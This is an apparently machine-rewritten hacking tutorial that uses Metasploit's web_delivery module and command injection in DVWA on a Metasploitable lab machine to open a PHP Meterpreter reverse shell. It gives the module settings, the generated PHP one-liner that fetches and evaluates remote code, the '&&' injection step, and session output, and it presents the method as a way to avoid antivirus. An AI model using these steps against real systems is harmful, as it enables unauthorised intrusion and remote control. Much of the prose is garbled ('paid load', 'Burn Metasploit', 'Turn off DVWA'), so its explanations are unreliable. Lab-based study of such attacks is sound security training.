How to Use Metasploit's Web Delivery Script & Command Injection to Pop a Shell


One of the best ways to Improve your skills as a giant is to learn to combine various attack techniques to achieve success. What if it were possible for the victim to connect to our machine and pay for the paid load of your choice? This is certainly possible with the powerful Metasploit and the aid of a method known as command injection.

Today, we will use Kali Linux and Metasploit to attack DVWA's vulnerable web system, which is installed as part of the Metasploitable 2 machine.

Overview of web delivery

Metasploit contains a useful module that captures server uploads performed on an invading machine. Web delivery script works when the target machine connects to the server and the download is paid. This module varies as it can target Python, Powershell, and PHP programs.

Web delivery scripts which is a great advantage for Stealth. Server and payload are hosted on the attacking machine, so when exploitation is done, nothing is written to disk on the target, making it less likely to create antivirus applications and other protections.

One caveat of this exploitation is that it requires a method of commanding the target to extract the script. Another possible alternative to this condition is the command injection.

Command Injection Primer

Command injection is a type of attack in which arbitrary Operating System commands are unreasonably executed on the host by a vulnerable web application. Typically, this happens when an application transfers unsafe user input from form to server, but this can also happen with cookies, HTTP headers, and other data sources.

This type of risk is particularly dangerous due to the internal power of system commands. Depending on the level of right you have to work with, the command injection can lead to an attacker in control of the entire system.

Don't Miss: How to Hack Android Phone Remotely 2020

Step 1: Turn off DVWA

The first thing we need to do is open DVWA and sign in using the default credentials.

Next, browse the "DVWA Security" tab and set the security level to "low" to ensure that our exploitation is done without interruption when we are ready.

Step 2: Identify the Vulnerable Entry Point

We can now go to the "Command Execution" page. For this attack to work, we must ensure that the target system is able to communicate with our local machine. We can take advantage of the default functionality of this page to capture our offensive machine. Just enter the IP address and hit "submit."

After receiving an effective response, the next thing we need to do is find out if this page is at risk of injecting. We can do that by entering the application command at the IP address we entered. Here, we will place the ls command with the &&I symbol and hit "move" again.

We can see that the app has responded with the content of the current index below, which means that the risk of command injection is real. We will use this to launch our web delivery script next.

Don't Miss: How to Hack Facebook without Phishing SOP

Step 3: Launch Web Delivery Script

Burn Metasploit by typing msfconsole into the terminal. We can download the web delivery module with the following command.

msf > use exploit/multi/script/web_delivery
Quickly, type options to display the current setting of this module.

msf exploit(multi/script/web_delivery) > options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST          yes       The local host to listen on. This must be an address on the local machine or
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Python
We need to select the appropriate target type, in this case, which is PHP. Please note that for this module to work properly, the target must be set before load is selected. Type display indicators to get a list of available options.

msf exploit(multi/script/web_delivery) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Python
   1   PHP
   2   PSH
   3   Regsvr32
   4   PSH (Binary)
Now we can set the rest of our options. Perform each command as shown below in order. For set target, it's an ID from the list above. The set payload is the payload we're using, in this case, php/meterpreter/reverse_tcp. For set lhost, it's the listening host address. And for set lport, it's our listening port.

msf exploit(multi/script/web_delivery) > set target 1
target => 1
msf exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost
lhost =>
msf exploit(multi/script/web_delivery) > set lport 1234
lport => 1234
Finally, we are ready to launch an attack. Type  run to start exploiting. The server on our local machine will start. The last line provided using the exploit, as shown below, is important because it indicates the command that needs to be performed in the target system.

msf exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on
[*] Using URL:
[*] Local IP:
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents(''));"

Step 4: Launch Attack

We can use the risk of command injections we found earlier as an easy way to attack. So copy the last line and paste it into the IP address with && on the "Command Execution" page in DVWA, just as we did earlier when we saw if the page was in danger in the first place.

If all goes according to plan, once we have done the "submission," our payload will apply and a Meterpreter session will be opened. Back at the terminal, we see that this is exactly what is happening.

msf exploit(multi/script/web_delivery) > [*]     web_delivery - Delivering Payload
[*] Sending stage (37775 bytes) to
[*] Meterpreter session 1 opened ( -> at 2018-10-22 11:12:05 -0500
We are not automatically thrown into the program, however, so we can use the session command to view active open times.

msf exploit(multi/script/web_delivery) > sessions

Active sessions

  Id  Name  Type                   Information                     Connection
  --  ----  ----                   -----------                     ----------
  1         meterpreter php/linux  www-data (33) @ metasploitable -> (
To interact with an active session, use the session -i command followed by the correct session ID number.

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Meterpreter : php/linux
We are now able to use Meterpreter commands such as getuid and sysinfo to display information on a targeted machine. We can also fall into the shell using the Shell command.

meterpreter > shell
Process 4869 created.
Channel 0 created.
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
  PID TTY          TIME CMD
 4656 ?        00:00:00 apache2
 4658 ?        00:00:00 apache2
 4661 ?        00:00:00 apache2
 4663 ?        00:00:00 apache2
 4665 ?        00:00:00 apache2
 4761 ?        00:00:00 apache2
 4793 ?        00:00:00 apache2
 4855 ?        00:00:00 php
 4856 ?        00:00:00 sh
 4858 ?        00:00:00 php
 4869 ?        00:00:00 sh
 4873 ?        00:00:00 ps
From here, we can issue commands such as who to view the current user, uname -a to show Operating System Information, and ps to see a list of active processes. By using command injection in a vulnerable web application, we were able to create our own web delivery script and found the shell on the target without writing anything to disk.

Don't Miss: Turn your Android Device into Hacking Machine

Wrapping Up

In this tutorial, we learned a little bit about command injection, the Metasploit web delivery script, and how we can combine these into an effective attack method. As this exploit avoids writing anything to disk, it increases the chances of success by fleeing antivirus solutions. In the security world, there are often many creative ways to combine different strategies to achieve results, all you have to do is take a look.

Post a Comment